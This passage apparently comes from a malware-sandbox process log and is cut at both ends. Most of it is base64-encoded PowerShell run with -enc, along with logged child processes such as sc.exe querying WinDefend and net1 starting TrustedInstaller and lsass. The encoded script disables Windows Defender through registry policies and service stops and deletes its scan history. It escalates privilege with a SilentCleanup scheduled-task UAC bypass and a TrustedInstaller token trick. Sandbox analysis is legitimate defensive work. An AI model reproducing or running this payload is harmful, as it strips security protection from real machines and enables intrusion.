CQAcwBjAHIAaQBwAHQAIAAtAHYAZQByAGIAIAByAHUAbgBhAHMAIAAtAHcAaQBuACAAMQA7ACAAYgByAGUAYQBrAH0ADQAKACAAIABzAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgACQAKAAnAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAnACsAJABzAGMAcgBpAHAAdAArACcAIAAjACcAKQANAAoAIAAgACQAegA9ACQAYgBwAGEAcwBzAC4AUgB1AG4ARQB4ACgAJABuAHUAbABsACwAMgAsADAALAAkAG4AdQBsAGwAKQA7ACAAJAB3AGEAaQB0AD0AMAA7ACAAdwBoAGkAbABlACgAJABiAHAAYQBzAHMALgBTAHQAYQB0AGUAIAAtAGcAdAAgADMAIAAtAGEAbgBkACAAJAB3AGEAaQB0ACAALQBsAHQAIAAxADcAKQB7AHMAbABlAGUAcAAgAC0AbQAgADEAMAAwADsAIAAkAHcAYQBpAHQAKwA9ADAALgAxAH0ADQAKACAAIABpAGYAKABnAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgAC0AZQBhACAAMAApAHsAcgBwACAAaABrAGMAdQA6AFwAZQBuAHYAaQByAG8AbgBtAGUAbgB0ACAAdwBpAG4AZABpAHIAIAAtAGUAYQAgADAAOwBzAHQAYQByAHQAIABwAG8AdwBlAHIAcwBoAGUAbABsACAALQBhAHIAZwBzACAAJABzAGMAcgBpAHAAdAAgAC0AdgBlAHIAYgAgAHIAdQBuAGEAcwAgAC0AdwBpAG4AIAAxAH0AOwBiAHIAZQBhAGsADQAKAH0ADQAKAGkAZgAgACgAJAB1ACAALQBlAHEAIAAyACkAIAB7AA0ACgAgACAAJABBAD0AWwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4AIgBEAGUAZgBgAGkAbgBlAEQAeQBuAGEAbQBpAGMAQQBzAHMAZQBtAGIAbAB5ACIAKAAxACwAMQApAC4AIgBEAGUAZgBgAGkAbgBlAEQAeQBuAGEAbQBpAGMATQBvAGQAdQBsAGUAIgAoADEAKQA7ACQARAA9AEAAKAApADsAMAAuAC4ANQB8ACUAewAkAEQAKwA9ACQAQQAuACIARABlAGYAYABpAG4AZQBUAHkAcABlACIAKAAnAEEAJwArACQAXwAsAA0ACgAgACAAMQAxADcAOQA5ADEAMwAsAFsAVgBhAGwAdQBlAFQAeQBwAGUAXQApAH0AIAA7ADQALAA1AHwAJQB7ACQARAArAD0AJABEAFsAJABfAF0ALgAiAE0AYQBrAGAAZQBCAHkAUgBlAGYAVAB5AHAAZQAiACgAKQB9ACAAOwAkAEkAPQBbAEkAbgB0ADMAMgBdADsAJABKAD0AIgBJAG4AdABgAFAAdAByACIAOwAkAFAAPQAkAEkALgBtAG8AZAB1AGwAZQAuAEcAZQB0AFQAeQBwAGUAKAAiAFMAeQBzAHQAZQBtAC4AJABKACIAKQA7ACAAJABGAD0AQAAoADAAKQANAAoAIAAgACQARgArAD0AKAAkAFAALAAkAEkALAAkAFAAKQAsACgAJABJACwAJABJACwAJABJACwAJABJACwAJABQACwAJABEAFsAMQBdACkALAAoACQASQAsACQAUAAsACQAUAAsACQAUAAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsAFsASQBuAHQAMQA2AF0ALABbAEkAbgB0ADEANgBdACwAJABQACwAJABQACwAJABQACwAJABQACkALAAoACQARABbADMAXQAsACQAUAApACwAKAAkAFAALAAkAFAALAAkAEkALAAkAEkAKQANAAoAIAAgACQAUwA9AFsAUwB0AHIAaQBuAGcAXQA7ACAAJAA5AD0AJABEAFsAMABdAC4AIgBEAGUAZgBgAGkAbgBlAFAASQBuAHYAbwBrAGUATQBlAHQAaABvAGQAIgAoACcAQwByAGUAYQB0AGUAUAByAG8AYwBlAHMAcwAnACwAIgBrAGUAcgBuAGUAbABgADMAMgAiACwAOAAyADEANAAsADEALAAkAEkALABAACgAJABTACwAJABTACwAJABJACwAJABJACwAJABJACwAJABJACwAJABJACwAJABTACwAJABEAFsANgBdACwAJABEAFsANwBdACkALAAxACwANAApAA0ACgAgACAAMQAuAC4ANQB8ACUAewAkAGsAPQAkAF8AOwAkAG4APQAxADsAJABGAFsAJABfAF0AfAAlAHsAJAA5AD0AJABEAFsAJABrAF0ALgAiAEQAZQBmAGAAaQBuAGUARgBpAGUAbABkACIAKAAnAGYAJwArACQAbgArACsALAAkAF8ALAA2ACkAfQB9ADsAJABUAD0AQAAoACkAOwAwAC4ALgA1AHwAJQB7ACQAVAArAD0AJABEAFsAJABfAF0ALgAiAEMAcgBgAGUAYQB0AGUAVAB5AHAAZQAiACgAKQA7ACQAWgA9AFsAdQBpAG4AdABwAHQAcgBdADoAOgBzAGkAegBlAA0ACgAgACAAbgB2ACAAKAAnAFQAJwArACQAXwApACgAWwBBAGMAdABpAHYAYQB0AG8AcgBdADoAOgBDAHIAZQBhAHQAZQBJAG4AcwB0AGEAbgBjAGUAKAAkAFQAWwAkAF8AXQApACkAfQA7ACAAJABIAD0AJABJAC4AbQBvAGQAdQBsAGUALgBHAGUAdABUAHkAcABlACgAIgBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAGAAUwBlAHIAdgBpAGMAZQBzAC4ATQBhAHIAYABzAGgAYQBsACIAKQA7AA0ACgAgACAAJABXAFAAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAVwByAGkAdABlACQASgAiACwAWwB0AHkAcABlAFsAXQBdACgAJABKACwAJABKACkAKQA7ACAAJABIAEcAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAQQBsAGwAbwBjAEgAYABHAGwAbwBiAGEAbAAiACwAWwB0AHkAcABlAFsAXQBdACcAaQBuAHQAMwAyACcAKQA7ACAAJAB2AD0AJABIAEcALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACQAWgApAA0ACgAgACAAJwBUAHIAdQBzAHQAZQBkAEkAbgBzAHQAYQBsAGwAZQByACcALAAnAGwAcwBhAHMAcwAnAHwAJQB7AGkAZgAoACEAJABwAG4AKQB7AG4AZQB0ADEAIABzAHQAYQByAHQAIAAkAF8AIAAyAD4AJgAxACAAPgAkAG4AdQBsAGwAOwAkAHAAbgA9AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABQAHIAbwBjAGUAcwBzAGUAcwBCAHkATgBhAG0AZQAoACQAXwApAFsAMABdADsAfQB9AA0ACgAgACAAJABXAFAALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsAEAAKAAkAHYALAAkAHAAbgAuAEgAYQBuAGQAbABlACkAKQA7ACAAJABTAFoAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAUwBpAHoAZQBPAGYAIgAsAFsAdAB5AHAAZQBbAF0AXQAnAHQAeQBwAGUAJwApADsAIAAkAFQAMQAuAGYAMQA9ADEAMwAxADAANwAyADsAIAAkAFQAMQAuAGYAMgA9ACQAWgA7ACAAJABUADEALgBmADMAPQAkAHYAOwAgACQAVAAyAC4AZgAxAD0AMQANAAoAIAAgACQAVAAyAC4AZgAyAD0AMQA7ACQAVAAyAC4AZgAzAD0AMQA7ACQAVAAyAC4AZgA0AD0AMQA7ACQAVAAyAC4AZgA2AD0AJABUADEAOwAkAFQAMwAuAGYAMQA9ACQAUwBaAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAFQAWwA0AF0AKQA7ACQAVAA0AC4AZgAxAD0AJABUADMAOwAkAFQANAAuAGYAMgA9ACQASABHAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAFMAWgAuAGkAbgB2AG8AawBlACgAJABuAHUAbABsACwAJABUAFsAMgBdACkAKQANAAoAIAAgACQASAAuACIARwBlAHQAYABNAGUAdABoAG8AZAAiACgAIgBTAHQAcgB1AGMAdAB1AHIAZQBUAG8AYABQAHQAcgAiACwAWwB0AHkAcABlAFsAXQBdACgAJABEAFsAMgBdACwAJABKACwAJwBiAG8AbwBsAGUAYQBuACcAKQApAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALABAACgAKAAkAFQAMgAtAGEAcwAgACQARABbADIAXQApACwAJABUADQALgBmADIALAAkAGYAYQBsAHMAZQApACkAOwAkAHcAaQBuAGQAbwB3AD0AMAB4ADAARQAwADgAMAA2ADAAMAANAAoAIAAgACQAOQA9ACQAVABbADAAXQAuACIARwBlAHQAYABNAGUAdABoAG8AZAAiACgAJwBDAHIAZQBhAHQAZQBQAHIAbwBjAGUAcwBzACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAQAAoACQAbgB1AGwAbAAsACQAYwBtAGQALAAwACwAMAAsADAALAAkAHcAaQBuAGQAbwB3ACwAMAAsACQAbgB1AGwAbAAsACgAJABUADQALQBhAHMAIAAkAEQAWwA0AF0AKQAsACgAJABUADUALQBhAHMAIAAkAEQAWwA1AF0AKQApACkAOwAgAGIAcgBlAGEAawANAAoAfQANAAoADQAKACQAdwBkAHAAPQAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgAnAA0ACgAnACAAUwBlAGMAdQByAGkAdAB5ACAAQwBlAG4AdABlAHIAXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACcALAAnAFwAVQBYACAAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAnACwAJwBcAE0AcABFAG4AZwBpAG4AZQAnACwAJwBcAFMAcAB5AG4AZQB0ACcALAAnAFwAUgBlAGEAbAAtAFQAaQBtAGUAIABQAHIAbwB0AGUAYwB0AGkAbwBuACcAIAB8ACUAIAB7AG4AaQAgACgAJAB3AGQAcAArACQAXwApAC0AZQBhACAAMAB8AG8AdQB0AC0AbgB1AGwAbAB9AA0ACgANAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAIABTAGUAYwB1AHIAaQB0AHkAIABDAGUAbgB0AGUAcgBcAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAJwAgAEQAaQBzAGEAYgBsAGUATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByAFwAVQBYACAAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAnACAATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AXwBTAHUAcABwAHIAZQBzAHMAIAAxACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACAAUwBlAGMAdQByAGkAdAB5ACAAQwBlAG4AdABlAHIAXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACcAIABEAGkAcwBhAGIAbABlAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAIAAxACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBlAGEAIAAwAA0ACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAFUAWAAgAEMAbwBuAGYAaQBnAHUAcgBhAHQAaQBvAG4AJwAgAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAF8AUwB1AHAAcAByAGUAcwBzACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAA0ACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtACcAIABFAG4AYQBiAGwAZQBTAG0AYQByAHQAUwBjAHIAZQBlAG4AIAAwACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACcAIABEAGkAcwBhAGIAbABlAEEAbgB0AGkAUwBwAHkAdwBhAHIAZQAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAJwAgAEQAaQBzAGEAYgBsAGUAQQBuAHQAaQBTAHAAeQB3AGEAcgBlACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAA0ACgBuAGUAdAAxACAAcwB0AG8AcAAgAHcAaQBuAGQAZQBmAGUAbgBkAA0ACgBzAGMALgBlAHgAZQAgAGMAbwBuAGYAaQBnACAAdwBpAG4AZABlAGYAZQBuAGQAIABkAGUAcABlAG4AZAA9ACAAUgBwAGMAUwBzAC0AVABPAEcARwBMAEUADQAKAGsAaQBsAGwAIAAtAE4AYQBtAGUAIABNAHAAQwBtAGQAUgB1AG4AIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAcwB0AGEAcgB0ACAAKAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAKwAnAFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAE0AcABDAG0AZABSAHUAbgAuAGUAeABlACcAKQAgAC0AQQByAGcAIAAnAC0ARABpAHMAYQBiAGwAZQBTAGUAcgB2AGkAYwBlACcAIAAtAHcAaQBuACAAMQANAAoAZABlAGwAIAAoACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKwAnAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByAFwAUwBjAGEAbgBzAFwAbQBwAGUAbgBnAGkAbgBlAGQAYgAuAGQAYgAnACkAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAAgACAAIAAgACAAIAAgACAAIAAgACAAIwAjACAAQwBvAG0AbQBlAG4AdABlAGQAIAA9ACAAawBlAGUAcAAgAHMAYwBhAG4AIABoAGkAcwB0AG8AcgB5AA0ACgBkAGUAbAAgACgAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQArACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABTAGMAYQBuAHMAXABIAGkAcwB0AG8AcgB5AFwAUwBlAHIAdgBpAGMAZQAnACkAIAAtAFIAZQBjAHUAcgBzAGUAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAJwBAACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAAOwAgAGkAZQB4ACgAKABnAHAAIABSAGUAZwBpAHMAdAByAHkAOgA6AEgASwBFAFkAXwBVAHMAZQByAHMAXABTAC0AMQAtADUALQAyADEAKgBcAFYAbwBsAGEAdABpAGwAZQAqACAAVABvAGcAZwBsAGUARABlAGYAZQBuAGQAZQByACAALQBlAGEAIAAwACkAWwAwAF0ALgBUAG8AZwBnAGwAZQBEAGUAZgBlAG4AZABlAHIAKQANAAoAIwAtAF8ALQAjAA==7⤵PID:2208
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" qc windefend8⤵
- Launches sc.exe
PID:4548
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"8⤵PID:4068
-
-
C:\Windows\system32\whoami.exe"C:\Windows\system32\whoami.exe" /groups8⤵PID:5140
-
-
C:\Windows\system32\net1.exe"C:\Windows\system32\net1.exe" start TrustedInstaller8⤵PID:1960
-
-
C:\Windows\system32\net1.exe"C:\Windows\system32\net1.exe" start lsass8⤵PID:1068
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ADQAKAHMAcAAgACcASABLAEMAVQA6AFwAVgBvAGwAYQB0AGkAbABlACAARQBuAHYAaQByAG8AbgBtAGUAbgB0ACcAIAAnAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAnACAAQAAnAA0ACgBpAGYAIAAoACQAKABzAGMALgBlAHgAZQAgAHEAYwAgAHcAaQBuAGQAZQBmAGUAbgBkACkAIAAtAGwAaQBrAGUAIAAnACoAVABPAEcARwBMAEUAKgAnACkAIAB7ACQAVABPAEcARwBMAEUAPQA3ADsAJABLAEUARQBQAD0ANgA7ACQAQQA9ACcARQBuAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBGAEYAJwB9AGUAbABzAGUAewAkAFQATwBHAEcATABFAD0ANgA7ACQASwBFAEUAUAA9ADcAOwAkAEEAPQAnAEQAaQBzAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBOACcAfQANAAoADQAKAGkAZgAgACgAJABlAG4AdgA6ADEAIAAtAG4AZQAgADYAIAAtAGEAbgBkACAAJABlAG4AdgA6ADEAIAAtAG4AZQAgADcAKQAgAHsAIAAkAGUAbgB2ADoAMQA9ACQAVABPAEcARwBMAEUAIAB9AA0ACgANAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQANAAoADQAKACQAbgBvAHQAaQBmAD0AJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzAFwAUwBlAHQAdABpAG4AZwBzAFwAVwBpAG4AZABvAHcAcwAuAFMAeQBzAHQAZQBtAFQAbwBhAHMAdAAuAFMAZQBjAHUAcgBpAHQAeQBBAG4AZABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwANAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgADAAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAA7ACAAaQBmACAAKAAkAFQATwBHAEcATABFACAALQBlAHEAIAA3ACkAIAB7AHIAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAH0ADQAKAA0ACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAA0ACgAkAGIAcABhAHMAcwA9ACQAYgBhAGYAZgBsAGkAbgBnAC4ARwBlAHQAVABhAHMAawAoACcAUwBpAGwAZQBuAHQAQwBsAGUAYQBuAHUAcAAnACkAOwAgACQAZgBsAGEAdwA9ACQAYgBwAGEAcwBzAC4ARABlAGYAaQBuAGkAdABpAG8AbgANAAoADQAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQAKgAnACkAewAkAHUAPQAzAH0ADQAKAA0ACgAkAHIAPQBbAGMAaABhAHIAXQAxADMAOwAgACQAbgBmAG8APQBbAGMAaABhAHIAXQAzADkAKwAkAHIAKwAnACAAKABcACAAIAAgAC8AKQAnACsAJAByACsAJwAoACAAKgAgAC4AIAAqACAAKQAgACAAQQAgAGwAaQBtAGkAdABlAGQAIABhAGMAYwBvAHUAbgB0ACAAcAByAG8AdABlAGMAdABzACAAeQBvAHUAIABmAHIAbwBtACAAVQBBAEMAIABlAHgAcABsAG8AaQB0AHMAJwArACQAcgArACcAIAAgACAAIABgAGAAYAAnACsAJAByACsAWwBjAGgAYQByAF0AMwA5AA0ACgAkAHMAYwByAGkAcAB0AD0AJwAtAG4AbwBwACAALQB3AGkAbgAgADEAIAAtAGMAIAAmACAAewByAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgAC0AZQBhACAAMAA7ACQAQQB2AGUAWQBvAD0AJwArACQAbgBmAG8AKwAnADsAJABlAG4AdgA6ADEAPQAnACsAJABlAG4AdgA6ADEAOwAgACQAZQBuAHYAOgBfAF8AQwBPAE0AUABBAFQAXwBMAEEAWQBFAFIAPQAnAEkAbgBzAHQAYQBsAGwAZQByACcADQAKACQAcwBjAHIAaQBwAHQAKwA9ACcAOwBpAGUAeAAoACgAZwBwACAAUgBlAGcAaQBzAHQAcgB5ADoAOgBIAEsARQBZAF8AVQBzAGUAcgBzAFwAUwAtADEALQA1AC0AMgAxACoAXABWAG8AbABhAHQAaQBsAGUAKgAgAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAgAC0AZQBhACAAMAApAFsAMABdAC4AVABvAGcAZwBsAGUARABlAGYAZQBuAGQAZQByACkAfQAnADsAIAAkAGMAbQBkAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsACAAJwArACQAcwBjAHIAaQBwAHQADQAKAA0ACgBpAGYAIAAoACQAdQAgAC0AZQBxACAAMAApACAAewANAAoAIAAgAHMAdABhAHIAdAAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGEAcgBnAHMAIAAkAHMAYwByAGkAcAB0ACAALQB2AGUAcgBiACAAcgB1AG4AYQBzACAALQB3AGkAbgAgADEAOwAgAGIAcgBlAGEAawANAAoAfQANAAoAaQBmACAAKAAkAHUAIAAtAGUAcQAgADEAKQAgAHsADQAKACAAIABpAGYAIAAoACQAZgBsAGEAdwAuAEEAYwB0AGkAbwBuAHMALgBJAHQAZQBtACgAMQApAC4AUABhAHQAaAAgAC0AaQBuAG8AdABsAGkAawBlACAAJwAqAHcAaQBuAGQAaQByACoAJwApAHsAcwB0AGEAcgB0ACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AYQByAGcAcwAgACQAcwBjAHIAaQBwAHQAIAAtAHYAZQByAGIAIAByAHUAbgBhAHMAIAAtAHcAaQBuACAAMQA7ACAAYgByAGUAYQBrAH0ADQAKACAAIABzAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgACQAKAAnAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAnACsAJABzAGMAcgBpAHAAdAArACcAIAAjACcAKQANAAoAIAAgACQAegA9ACQAYgBwAGEAcwBzAC4AUgB1AG4ARQB4ACgAJABuAHUAbABsACwAMgAsADAALAAkAG4AdQBsAGwAKQA7ACAAJAB3AGEAaQB0AD0AMAA7ACAAdwBoAGkAbABlACgAJABiAHAAYQBzAHMALgBTAHQAYQB0AGUAIAAtAGcAdAAgADMAIAAtAGEAbgBkACAAJAB3AGEAaQB0ACAALQBsAHQAIAAxADcAKQB7AHMAbABlAGUAcAAgAC0AbQAgADEAMAAwADsAIAAkAHcAYQBpAHQAKwA9ADAALgAxAH0ADQAKACAAIABpAGYAKABnAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgAC0AZQBhACAAMAApAHsAcgBwACAAaABrAGMAdQA6AFwAZQBuAHYAaQByAG8AbgBtAGUAbgB0ACAAdwBpAG4AZABpAHIAIAAtAGUAYQAgADAAOwBzAHQAYQByAHQAIABwAG8AdwBlAHIAcwBoAGUAbABsACAALQBhAHIAZwBzACAAJABzAGMAcgBpAHAAdAAgAC0AdgBlAHIAYgAgAHIAdQBuAGEAcwAgAC0AdwBpAG4AIAAxAH0AOwBiAHIAZQBhAGsADQAKAH0ADQAKAGkAZgAgACgAJAB1ACAALQBlAHEAIAAyACkAIAB7AA0ACgAgACAAJABBAD0AWwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4AIgBEAGUAZgBgAGkAbgBlAEQAeQBuAGEAbQBpAGMAQQBzAHMAZQBtAGIAbAB5ACIAKAAxACwAMQApAC4AIgBEAGUAZgBgAGkAbgBlAEQAeQBuAGEAbQBpAGMATQBvAGQAdQBsAGUAIgAoADEAKQA7ACQARAA9AEAAKAApADsAMAAuAC4ANQB8ACUAewAkAEQAKwA9ACQAQQAuACIARABlAGYAYABpAG4AZQBUAHkAcABlACIAKAAnAEEAJwArACQAXwAsAA0ACgAgACAAMQAxADcAOQA5ADEAMwAsAFsAVgBhAGwAdQBlAFQAeQBwAGUAXQApAH0AIAA7ADQALAA1AHwAJQB7ACQARAArAD0AJABEAFsAJABfAF0ALgAiAE0AYQBrAGAAZQBCAHkAUgBlAGYAVAB5AHAAZQAiACgAKQB9ACAAOwAkAEkAPQBbAEkAbgB0ADMAMgBdADsAJABKAD0AIgBJAG4AdABgAFAAdAByACIAOwAkAFAAPQAkAEkALgBtAG8AZAB1AGwAZQAuAEcAZQB0AFQAeQBwAGUAKAAiAFMAeQBzAHQAZQBtAC4AJABKACIAKQA7ACAAJABGAD0AQAAoADAAKQANAAoAIAAgACQARgArAD0AKAAkAFAALAAkAEkALAAkAFAAKQAsACgAJABJACwAJABJACwAJABJACwAJABJACwAJABQACwAJABEAFsAMQBdACkALAAoACQASQAsACQAUAAsACQAUAAsACQAUAAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsAFsASQBuAHQAMQA2AF0ALABbAEkAbgB0ADEANgBdACwAJABQACwAJABQACwAJABQACwAJABQACkALAAoACQARABbADMAXQAsACQAUAApACwAKAAkAFAALAAkAFAALAAkAEkALAAkAEkAKQANAAoAIAAgACQAUwA9AFsAUwB0AHIAaQBuAGcAXQA7ACAAJAA5AD0AJABEAFsAMABdAC4AIgBEAGUAZgBgAGkAbgBlAFAASQBuAHYAbwBrAGUATQBlAHQAaABvAGQAIgAoACcAQwByAGUAYQB0AGUAUAByAG8AYwBlAHMAcwAnACwAIgBrAGUAcgBuAGUAbABgADMAMgAiACwAOAAyADEANAAsADEALAAkAEkALABAACgAJABTACwAJABTACwAJABJACwAJABJACwAJABJACwAJABJACwAJABJACwAJABTACwAJABEAFsANgBdACwAJABEAFsANwBdACkALAAxACwANAApAA0ACgAgACAAMQAuAC4ANQB8ACUAewAkAGsAPQAkAF8AOwAkAG4APQAxADsAJABGAFsAJABfAF0AfAAlAHsAJAA5AD0AJABEA